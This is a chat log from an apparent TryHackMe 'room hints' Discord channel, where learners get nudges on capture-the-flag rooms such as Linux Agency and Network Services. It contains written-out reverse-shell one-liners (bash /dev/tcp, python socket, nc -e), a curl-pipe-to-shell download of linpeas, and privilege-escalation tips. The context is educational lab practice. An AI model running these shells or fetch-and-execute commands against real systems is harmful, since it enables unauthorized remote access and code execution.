its same as normal variable
wicked bolt
there are some that are set by system that will be in every environment like $PATH
ripe hedge
pretty much
wicked bolt
there's a way to set some permanently but can't remember what file it is.
distant tartan
there are some that are set by system that will be in every environment like $PA...
ohh so they are already set up by system thanks
hexed crescent
its same as normal variable
Also research the difference between global and non-global. π₯³
distant tartan
Also research the difference between global and non-global. π₯³
sure
solemn onyx
I was solving linux agency room... N I got stuck in escaping the docker container... π It isn't mounting
wicked bolt
I was solving linux agency room... N I got stuck in escaping the docker containe...
look around the web for different methods I don't think I had to mount anything
solemn onyx
Srsly?? There is another way to esc it?
wicked bolt
unless I am completely wrong and being smooth brain
solemn onyx
I literally got the whole way all without hints... Now stuck here for hoursπ
solemn onyx
unless I am completely wrong and being smooth brain
Hmm well can u be a little more specific what u tried?
Can I dm u?? I don't wanna spoil the challenge for others
wicked bolt
let me check if i noted it down or not
solemn onyx
I was following a blog... And then tried using the
mount /dev/sda1 /mnt/root
lament forge
Has anyone completed Archangel? I have been stuck on the Flag2 part for hours now. Have tried a ton but can only ever get the normal text from the page output or "Sorry, thats not allowed"
hexed crescent
Has anyone completed Archangel? I have been stuck on the Flag2 part for hours no...
No hints allowed yet on that room.
lament forge
No hints allowed yet on that room.
Alrighty. Thanks. Will go back and start from square one. I have to be missing something easy.
hazy sequoia
What am i doing wrong?
still in the netwrok services room, attempting telnet exploitation. why can't i generate the payload using msfvenom?
is there a fault with the command i'm using?
astral crest
What am i doing wrong?
your command looks alright, is that ip that you assigned to lhost, your machine's ip or the box's?
white salmon
What am i doing wrong?
I wrote exactly the same command, and it worked
hazy sequoia
your command looks alright, is that ip that you assigned to lhost, your machine'...
thats the IP of the attack box
hazy sequoia
10.10.283.33 doesn't exist
white salmon
shits happens
hazy sequoia
damn, what a diff swapping numbers makes
ty for pointing that out
woulda prob been another 30 mins before i noticed it
astral crest
72h has not passed yet. So no hints yet
half escarp
Oh I see...
quiet stump
Oh I see...
Do not post spoilers, especially when 72 hrs hasn't passed since release.
half escarp
Oops, my bad man, didn't know about this rule, good to know!
Sorry about that
prisma gull
Can anyone give a nudge on Linux Agency mission25 flag....
prisma gull
i got the binary check all the files in the mission24 directory......am i suppose to do some reverse engineering on that binary
glacial gust
the binary is a rabbit hole, try looking elsewhere in the folder
onyx crescent
@prisma gull and @glacial gust For Agency Mission 24, I'm pretty sure the ||binary|| is not a rabbit hole. I had to use it to solve...
prisma gull
so i have to do some reverse engineering on that binary
onyx crescent
so i have to do some reverse engineering on that binary
Yes. I did.
simple mountain
Do not provide or ask for help or hints for Archangel room until 6th Feb, 7pm (GMT)
simple mountain
Do not provide or ask for help or hints for `Archangel` room until 6th Feb, 7pm ...
prisma gull
@glacial gust I checked all the other files in that directory but nothing showed up
glacial gust
if you look at the hint, it references money transfers, if you do some word play with a money transfer app and a file in the directory you should be able to locate the flag
prisma gull
can I DM you
onyx crescent
can I DM you
Feel free to DM me, if you'd like as well.
white salmon
On the Nmap room (https://tryhackme.com/room/furthernmap) in the practical elements - my scans are taking ages - like 15 mins - I've had to add the -Pn option as it was saying all the ports were closed otherwise - just not sure if I have missed something
chilly wigeon
well done.. archangel...
thorn dagger
Can I get a hint for the nmap room
question: ||
How would you perform a ping sweep on the 172.16.x.x network (Netmask: 255.255.0.0) using Nmap? (CIDR notation)||
current answer:
||nmap -sn 172.16.x.x/16||
ripe hedge
x is used as a placeholder in the question
stuck fractal
It's a common placeholder generally
But 172.16.x.x implies a /16
As does the netmask
ripe hedge
so that part is fine π
distant tartan
hello i am on linux agency mission25 i cant use ls -l mission25@linuxagency:~$ ls -l
output bash: ls: No such file or directory
can i get a hint
sterile dawn
@distant tartan see path
naive grail
hello i am on linux agency mission25 i cant use ls -l mission25@...
the output says that ls do not exists.. it is this possible?
sterile dawn
Variable
distant tartan
the output says that ls do not exists.. it is this possible?
no
sterile dawn
echo $PATH@distant tartan
distant tartan
Now it will work
yes
distant tartan
there is not path you need to add
thanks bro
kind bear
if not worked try this
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
frail rain
Close the shell and open a new one maybe?
sterile dawn
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
/bin was enough
frail rain
Restoring path is the only way ig
distant tartan
if not worked try this
it worked
sterile dawn
distant tartan
Restoring path is the only way ig
actually restoring path was only the task
opal vine
guys i'm doing the linux agency room
i did it before and i reached to the user reza and now i'm trying to do it again
but the thing is i'm in as the user viktor and i know in oreder to escalate to dalia i need to give my self a shell using the 47.sh file
i tried
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
nc -e /bin/sh 10.0.0.1 1234
but none worked
before the bash one worked with me
what's wrong now?
hazy sequoia
Room: network services
Task 10: Exploiting FTP
Using hydra to generate possible passwords, I see it puts forward 14 million possibilities. Am I seriously expected to sit here while it tries all of these? does it actually try them and return a value when one works or am i suppose to be doing something else?
ripe hedge
@opal vine is that your correct IP?
opal vine
Room: network services
Task 10: Exploiting FTP
Using hydra to generate possible ...
it actually does
you can try the -V for verbose
opal vine
<@682228850750521393> is that your correct IP?
yup im pretty sure
ripe hedge
10.0.0.1 is not your tun0 ip
woven mirage
Room: network services
Task 10: Exploiting FTP
Using hydra to generate possible ...
you dont need to wait for all the passwords to be tested, the file has 14 million entries, but the password will probably be in the first few thousands
hazy sequoia
it actually does
you can try the -V for verbose
I did, its showing me a ton of results but so far the end of the line for all of them says 0/0
ripe hedge
For THM, brute force should take no longer than 5 minutes
hazy sequoia
you dont need to wait for all the passwords to be tested, the file has 14 millio...
omg! first few thousand?! lol
ripe hedge
yup i just copies from pentest monkey cheat sheet
You'll have to modify them
hazy sequoia
its only on 800+
kind bear
yup i just copies from pentest monkey cheat sheet
its diff ip
try to use your ip (tun0)
kind bear
yes right
ripe hedge
Should work
opal vine
it's not
i know that there's an interval where the root re-set everything
kind bear
if didnt then try it again cuz it changes after 30 sec
opal vine
but i did it 45645 times
kind bear
what is your listener command ?
ripe hedge
You have 30 seconds to set the file, 30 seconds after its run, it will be reset
kind bear
they way you wrote that rev shell the listener command should be nc -lnvp 8080
ripe hedge
I used watch to see when the reset occurred
opal vine
echo "bash -i >& /dev/tcp/10.6.47.204/8080 0>&1" >> 47.sh
ok this worked, i think it was a typo idk
thanks for the help @ripe hedge @kind bear
kind bear
anytime 
ripe hedge
Good hunting
thorn dagger
trying to complete the nmap room. stuck on this question
Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?
Currently using this command and getting this repsonse
||``$ sudo nmap -sX -p1-999 10.10.84.131
Starting Nmap 7.60 ( https://nmap.org ) at 2021-02-04 15:02 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.12 seconds''||
When I run -Pn to check I get told otherwise though
||''$ nmap -Pn 10.10.84.131
Starting Nmap 7.60 ( https://nmap.org ) at 2021-02-04 15:00 EST
Nmap scan report for 10.10.84.131
Host is up (0.16s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
135/tcp open msrpc
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 10.35 seconds''||
thorn dagger
the xmas and port range correct?
stuck fractal
You want an xmas scan. That skips the ping. And scans the specific port range.
All three flags.
thorn dagger
Would that cause the host to show as down?
stuck fractal
Would what?
thorn dagger
the missing flag. when I try to xmas scan i'm told the host is down. when i use -Pn i'm toild the host is online. i'll try to go back over the coursework
stuck fractal
Just ask your question
white salmon
Mission25 room linux academy
mighty nova
Linuxacademy
astral smelt
You mean linux agency?
astral smelt
So flag 25 ||you're not able to cat anything, right?||
mighty nova
No
There is only .viminfo file to cat
And bride file is asking for money but where to insert
I tried vim bribe
Asking for a command in it
@astral smelt any lead..?
astral smelt
<@342385957175296008> any lead..?
Ah sorry thought you was on the next one try the ||export command||
candid nimbus
There is only .viminfo file to cat
So did you cat the .viminfo file?
candid nimbus
It's not that big. If I'm remembering right it might be worth a browse
white salmon
@simple mountain Hey guy, can you give me a hint on this question? I keep typing FTP as the service but telling me it's incorrect ?
simple mountain
Where are we at?
simple mountain
not seeing your port numbers on that
white salmon
The answer to that question is giving three asterisks, so i'm assuming it's FTP but that seems to not be the correct answer
How did you discover this?
white salmon
sory
Dammit deja lol
So bottom line, this took creative thinking
for the answer
simple mountain
Ok... roki - run it anyway.
white salmon
Thanks you guys lol
simple mountain
Yeah. So 1 qeustion was 'How many services on ports under 1000'. And the next question asked for the higher port.. and you made an assumption π
rare valve
Guys any hints on Keldagrim room ?
sly bronze
has anyone finished with Intro to x86-64 room? I'm stuck on CRACKME1 don't know exactly how to do it
NEW
hazy rune
any
Is anyone else having issues with the sysinternals room not loading the live packages ?
opal vine
guys i'm doing linux agency , i reached to the user sean
but i can't find his flag , like is this normal?
novel sparrow
Guys any hints on Keldagrim room ?
ya, ask a question you want a hint on
stuck fractal
Just be patient and wait?
opal vine
wait for what
stuck fractal
wait for what
Someone who's completed the room and wants to give you a hint
opal vine
oh ok
ashen scaffold
@opal vine what user are on currently loged in as?
If you are currently sean, grep and certain logs are your friends
ashen scaffold
π
stuck fractal
!rule 13
proud scarabBOT
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
distant tartan
hello i am doing linux agence how to extract a flag from flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
stuck fractal
This is the room hints channel. @tulip bronze
tulip bronze
fair
stuck fractal
hello i am doing linux agence how to extract a flag from flag.mp3.mp4.exe.elf.t...
Maybe determine the actual file type.
distant tartan
Maybe determine the actual file type.
how to do that can i found it on googgle
distant tartan
Why not google it first before asking?
sure
stuck fractal
Practically all information can be found on google
distant tartan
Why not google it first before asking?
file etc is it this just making sure
stuck fractal
file etc is it this just making sure
Try it and find out
Research the command if you don't think it is right
No reason to ask me when you could find out faster yourself and learn something in the process
distant tartan
No reason to ask me when you could find out faster yourself and learn something ...
ok
novel sparrow
lol at least 1 rickroll(s) in archangel
stuck fractal
@novel sparrow Let's just not
novel sparrow
ok
distant tartan
Research the command if you don't think it is right
file -i file name worked gave me file type as g-zip and charset as binary
distant tartan
Why not carry on until it's done?
yes now i have to dcompress it thanks for the hint
distant tartan
Why not carry on until it's done?
thanks i got the flag
fierce cloak
hi, can someone help me understand this syntax? "-perm -perm -u=s"
i know it selects the SUID bit, but i dont quite undersrand the -u= part
silver otter
hi, can someone help me understand this syntax? "-perm -perm -u=s"
are you talking about the find command?
fierce cloak
aye
silver otter
also is this a room specific task or more 'infosec general' (just to make sure correct discussion right place etc)
fierce cloak
well, i'm working on the find room
and im just looking to undertand the syntax a little more clearly
silver otter
well there is a section in the manual on find with permissions and it talks about symbolic user id representation in some examples
'man find' should bring it up
fierce cloak
yeah, i've read through the majority
perhaps i'm a little dense, but it seems amiguous
silver otter
so files that user has setuid for u=s
ripe hedge
guys i'm doing linux agency , i reached to the user sean
Look at his groups, figure out what that means
pure thistle
can anybody help me out with Cyborg having trouble getting ||borg|| to run
onyx crescent
can anybody help me out with Cyborg having trouble getting ||borg|| to run
Sure, @pure thistle. What do you have so far? Feel free to DM, if you'd like.
distant tartan
i am on linux agency last task i want to find dailas flag i searched it qute a lot in vektors dir but didnt found any thing great any hint would be appritated
ripe hedge
you'll need to log in as dalia
long cradle
For the metasploit room, when i set lhost to my own tryhackme ip, i enter show options and still shows my own ip addr?
hollow mica
hi! did anyone try to solve the OWASP top 10 room? for some reason the webserver from command injection practical is not working in any browser whatsoever. however using curl i get responses and html back. did anyone else encounter this issue?
woven mirage
hi! did anyone try to solve the OWASP top 10 room? for some reason the webserver...
try this #site-support message
woven mirage
For the metasploit room, when i set lhost to my own tryhackme ip, i enter show o...
send screenshot
distant tartan
you'll need to log in as `dalia`
i dont have the flag for it i ony have viktor flag
ripe hedge
yup
ripe hedge
the goal of the game here is priv esc
long cradle
send screenshot
what could i send a screenshot of?
woven mirage
your terminal, the commands you ran
distant tartan
the goal of the game here is priv esc
i havr to privsec to dailias dir
distant tartan
is that what you mean
distant tartan
you won't have any passwords for a while
if i am not wrong there was a comand lik perm xyz to find permissions to file can you help me with tha
that
ripe hedge
you'll have to enumerate the system
distant tartan
you'll have to enumerate the system
by gobuster
hollow mica
try this https://discord.com/channels/521382216299839518/521771811768107008/7826...
thank you! it worked!
ripe hedge
linpeas is a popular script
distant tartan
linpeas is a popular script
ok got it
ripe hedge
it might find something interesting
distant tartan
thanks
distant tartan
it might find something interesting
it will list vulnerabalities
will linux.sh work
distant tartan
what's linux.sh?
it was also a script lke limpeas never mind let me try it
i can be wrong
long cradle
your terminal, the commands you ran
idk how i feel about sending the screenshot with my ips on it tbh i dont think it was anything wrong with the commands i ran but maybe something wrong with the vpn config file or something? When i ran the set LHOST "thm_ip" then i ran show options and my own ip showed up
distant tartan
linpeas is a popular script
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh i used this but current speed remains 0
ripe hedge
there's no internets on the targets
distant tartan
there's no internets on the targets
ohh
ripe hedge
grab it locally and serve it via a python server or something
woven mirage
idk how i feel about sending the screenshot with my ips on it tbh i dont think i...
well, if you don't want to send screenshots thats okay, but it will make it harder to troubleshoot, also, showing your private ip is not a problem, unless one of us is in your network we cant talk to your machine, but if it makes you feel better you can take a screenshot and edit it in a image editing software to hide the ips at least for us to know what is going on, but again, no problem showing your private and vpn ips here
hazy sequoia
Room: Network Services 2
Task: 4 - Exploiting NFS
Been having issues with this task but have been figuring my way through it until now. It gave instructions to add SUID bit permission to bash file using "sudo chmod +[permission] bash" did that, didnt work, still couldnt run the bash file until I did "sudo chmod ### bash" then I did "sudo chmod +[permission] bash".
Now i got the permissions how they are suppose to be, I SSH into the machine as the user, run bash, I get a bash shell. problem is the bash shell has literally zero privileges to run anything. So I can't find the root flag.
Would someone mind advising me where I am going wrong. Not asking for a solution just a nudge in the right direction.
long cradle
grab it locally and serve it via a python server or something
ty for understanding and i just dont feel comfortable doing it honestly. But I feel my question is more geared towards a technical issue. I have completed this room already and I am running through it again for fun. When I originally did it I had a subscription (now I don't). So is it normal even though I set LHOST to the thm ip to show my priv ip on my end?
stuck fractal
@hazy sequoia there's a flag you need to stop bash dropping suid permissions
You can find it with research
stuck fractal
ty for understanding and i just dont feel comfortable doing it honestly. But I f...
Verify with the bot, screenshot what you're doing
distant tartan
what's linux.sh?
sorry i meant linenum
ripe hedge
ty for understanding and i just dont feel comfortable doing it honestly. But I f...
doesn't seem normal
distant tartan
grab it locally and serve it via a python server or something
was it for me
distant tartan
I think there was a misclick
yes
ripe hedge
actually i meant linenum instead if linux .sh
they both do similar things
woven mirage
ty for understanding and i just dont feel comfortable doing it honestly. But I f...
i wanted a screenshot because i've seen people having problems by setting the lhost for the wrong module
hazy sequoia
<@200408243535609865> there's a flag you need to stop bash dropping suid permiss...
what do you mean, I am literally in the bash shell now
distant tartan
yes
tbh i dont know how to serve it from python server is there any site where i can learn it
hazy sequoia
stuck fractal
I mean exactly what I said. When running the bash binary, you need to use a flag to stop it dropping suid permissions.
woven mirage
setting the lhost and it not changing doesn't have anything to do with your vpn, all of this setting up of the metasploit is going on in your machine, it will speak to the network only when it runs
stuck fractal
But also ls -lah and screenshot
hazy sequoia
long cradle
setting the lhost and it not changing doesn't have anything to do with your vpn,...
so when I run metasploit that will connect my thm ip?
ripe hedge
tbh i dont know how to serve it from python server is there any site where i can...
python3 -m http.server 8000 will open a web server on port 8000
stuck fractal
@hazy sequoia exit that shell. Then try again in the directory that the binary is in.
woven mirage
so when I run metasploit that will connect my thm ip?
the ips need to be right, if the metasploit isn't changing you are either doing something wrong or theres something wrong in your machine, this has nothing to do with your subscription
distant tartan
`python3 -m http.server 8000` will open a web server on port 8000
how to serve limpeas from there
ripe hedge
it'll serve from whatever directory you're in
distant tartan
it'll serve from whatever directory you're in
but i think i'll have to modify the command of limpeas
hazy sequoia
you mean here?
long cradle
the ips need to be right, if the metasploit isn't changing you are either doing ...
gotcha and I will try to figure this out again at a later time. Thank you for your help
distant tartan
well, instead of getting it from github you get it from your tun0 ip
is it for me
ripe hedge
curl 10.x.x.x:8000/linpeas.sh | /bin/bash
stuck fractal
you mean here?
Notice how it's owned by cappuccino?
ripe hedge
or sh, whatevs
stuck fractal
It needs to be root owned
Your permissions are also a bit messed up
The s should be lowercase
hazy sequoia
those r the only permissions that would allow the question to be completed
stuck fractal
S means suid but not executable.
stuck fractal
those r the only permissions that would allow the question to be completed
You could argue, or you could listen
hazy sequoia
i ran the command as it said but i kep getting the upper case S
ripe hedge
or +x
stuck fractal
Then add suid
hazy sequoia
stuck fractal
From your own machine. As root. Where it's mounted.
ripe hedge
you may need to sudo
distant tartan
curl 10.x.x.x:8000/linpeas.sh | /bin/bash
ripe hedge
you didn't download it properly
at least you didn't get the raw version
but you got an html page
thorn dagger
From the network services room
"Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?"
ah I don't seem to be able to upload photos
stuck fractal
!docs verify
proud scarabBOT
TryHackMe
ripe hedge
what looks interesting?
distant tartan
at least you didn't get the raw version
what shoud i do then
distant tartan
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-...
with this link
thorn dagger
I'm not sure how to read the files, tried using vi, vim, nano, and cat and get invalid arguement errors
using the attackbox hosted through the site
ripe hedge
you can get them and read locally
stuck fractal
I'm not sure how to read the files, tried using vi, vim, nano, and cat and get i...
You're in an smbclient shell
Not a linux or windows command shell
thorn dagger
ah alright, tried the get command and it worked, now just gotta look up how to choose where to save the files
thanks friends
ripe hedge
you'll by default save to the location you opened the shell from
distant tartan
that link should work
i have to useit on my local machine or vim
stuck fractal
What
distant tartan
your machine for internet
??
ripe hedge
now I'm lost...
hazy sequoia
From your own machine. As root. Where it's mounted.
ty for the assist
distant tartan
now I'm lost...
hey i am doig it for first time please dont lose hope
ripe hedge
you get the script from the internet to your attack box, then from the attack box to the target vm
distant tartan
you get the script from the internet to your attack box, then from the attack bo...
how to do it from attack box to vim
ripe hedge
with the python server?
distant tartan
i got the reciveing connection to python server but gave an error 404
ripe hedge
where did you store the script?
distant tartan
where did you store the script?
ripe hedge
oh you did a git clone
distant tartan
oh you did a git clone
yes
ripe hedge
so you need to add the right folder when you get from the vm
you're serving from /home/kali
the script is in /home/kali/privilege-escalation-awesome-scripts-suite/linPEAS
distant tartan
so i have to change cmd
thorn dagger
Still stuck on this question, completed the rest of the questions and found the authentication key. but can't find a profile name anywhere
Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
stuck fractal
Did you read the file with the long name?
ripe hedge
probably a name inside it
thorn dagger
Cant figure out how to get it
ripe hedge
ah, guess \ doesn't escape that
thorn dagger
oh
stuck fractal
Use quotes
thorn dagger
I see now. Thank you. need to try to remember rules will be different in different shells.
loud warren
Hi!
Can anyone give me a hint for the room Year of the Rabbit ?
I can speak in a private message so i donΒ΄t spoil anybody
Thanks!
opal vine
Hi!
Can anyone give me a hint for the room Year of the Rabbit ?
I can speak in ...
pm me
simple mountain
Do not provide or ask for help or hints for TOC2 room until 8th Feb, 7pm (GMT)
grim tapir
good evening everyone. I am doing the Relevant and i am probably over complicating things. Anyone available for a hint?
stuck fractal
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
grim tapir
Got it!
Room: Relevant - Penetration Testing Challenge
Stage: Enumerating for the first shell, got 1 working account and enumerated all available accounts. Saw the obvious CVEs but they are not working correctly. Also have the available shares.
Tools used so far: nmap, gobuster (didnt find anything), null session rpc and with accounts, smbmap and smbclient, tried psexec with impacket but nothing. Also tried to rdp on it but can't make it. Going for hydra now but i think it is overkill. Tried metasploit but since it is not needed, just gave up on it.
ripe hedge
check the shares a bit more closely
grim tapir
Got the first one available, but the other 2 are not working. I can use another one but dunno if its the right way
ripe hedge
also the directory-list-2.3-medium.txt list might give results
grim tapir
hmm maybe i misused gobuster, gonna see it again
ripe hedge
should be enough to put you back on track
viscid osprey
I am trying to access evilshell.php but my connection constantly times out?OWASP top 10 anyone else have a problem?
nevermind Im an idiot!!
pure thistle
can anyone help me out with crack the hash2 how do i create a border mutation rule for JtR useing numbers and special charaters?
fallen lodge
I am doing Day 14 Where's Rudolf? Of Learn Cyber Security in 25 days series, I want to find the password for Rudolph's email breach but the recommended free site : scylla.sh is down, unable to find another free site like that, can anyone suggest a good site, thanks.
cyan token
Archangel room. Nice rickroll XD. is backup SUID file just a red herring?
trim haven
Have you tried to exploit it?
cyan token
mhm. I don't seem to understand how? Should i transfer it to my local and do RE ?
trim haven
You need to try and understand what it's doing, I'm sure you can probably use gidra to but it is much more simple to find out than that.
cyan token
aha i see
white salmon
I'm using smbclient and need to find out who owns a file - I can't find how I'd do this anywhere unless I've missed something on the smbclient help page?
stuck fractal
I'm using smbclient and need to find out who owns a file - I can't find how I'd ...
I don't think you need to do that.
white salmon
I don't think you need to do that.
On having a break and re reading the question I just realised π
Still not got it but hopefully will at some point!
fallen lodge
Thanx, I'll check that one out
white salmon
Just finished toc2 by @hallow carbonmints . Learned something new from the root part. Thanks a lot - it was fun